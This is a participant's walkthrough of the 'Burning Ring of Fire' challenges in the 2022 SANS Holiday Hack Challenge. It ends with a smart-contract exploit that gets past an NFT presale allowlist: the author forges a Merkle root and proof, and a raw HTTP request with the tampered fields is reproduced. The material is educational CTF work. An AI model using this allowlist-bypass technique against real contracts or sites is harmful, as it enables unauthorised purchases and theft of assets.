Burning Ring of Fire

Buy a Hat

For this challenge the first thing we need to do is select which hat we are interested in buying. We will be picking the standard santa hat. When we click on it we are provided what is the receiving account and what will be the ID used to validate our purchase. Each hat has their own account to receive the 10 Kringle Coins

The next step is to visit the KTM machine with this information and pre-approve this transfer

Now we need to get back to the hat vending machine and make the purchase

BlockChain Divination

Question - Use the Blockchain Explorer in the Burning Ring of Fire to investigate the contracts and transactions on the chain. At what address is the KringleCoin smart contract deployed?

The answer for this challenge is on the second block of the blockchain.

Exploit a Smart Contract

On this challenge we are tasked to buy a Bored Sporc NFT and to do it we need to be part of a whitelist that is being validated against a Merkle Tree. Initially (and during many hours) my plan was to find a flaw on the Merkle Tree implementation. After rewatching few times the video of Prof. Qwerty Petabyte I understood that this would not be possible. Also the mention that he does in regards of publishing code got me to search for the Merkle Tree implementation on the web without success.

After many hours have decided to look for all the chests around the map and one of them contained the link to the github repo that I was initially looking for.

At this time I have looked into the information I know and still did not get the answer how could I exploit this and get myself validated as part of the whitelist. I then decided to look into the web page and the validation of the whitelist.

POST /cgi-bin/presale HTTP/2
Host: boredsporcrowboatsociety.com
Content-Length: 176
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: https://boredsporcrowboatsociety.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://boredsporcrowboatsociety.com/presale.html?&challenge=bsrs&username=abc123bitly&id=c0b42020-f871-4edc-a844-ee67fc03b0e9&area=level5&location=4,15&tokens=
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"WalletID":"WalletID","Root":"0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1","Proof":"PROOF","Validate":"true","Session":"c0b42020-f871-4edc-a844-ee67fc03b0e9"}

The fact of us knowing the root node is not a weakness on the Merkle Tree structure but allowing us to control it is. In order to exploit the smart contract we just need to provide a valid Merkle Tree and we can do it because we control all moving parts:

• Root

• WalletID

• Proofs

In order to build the Merkle Tree we need first to clone the GitHub repo from QPetabyte. For that we run git clone https://github.com/QPetabyte/Merkle_Trees.git

Next step is to build the docker image docker build -t merkletrees . After is built we need to jump into the docker: docker run -it --rm --name=merkletrees merkletrees The next step to change the merkle_tree.py allowlist to contain our Wallet ID address

Now that we have added replaced one of the entries with our wallet ID we just need to run the python script to produce the root and proof we need.

Now that we have the details we just need to issue a request to validate we are part of the whitelist.

Now like we have done for the Hat we need to issue a pre-aproved purchase to 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a but this time with 100 Kringle Coins.

The last step is to remove the validate check to make the purchase

Unfortunately I have not kept the original screenshot but I got the #11 https://boredsporcrowboatsociety.com/TOKENS/TOKENIMAGES/BSRS11.png

With this we reach to the end of the 2022 SANS Holiday Hack Challenge. I had a lot of fun solving it. Thanks to Ed Skoudis and whole team for this event!!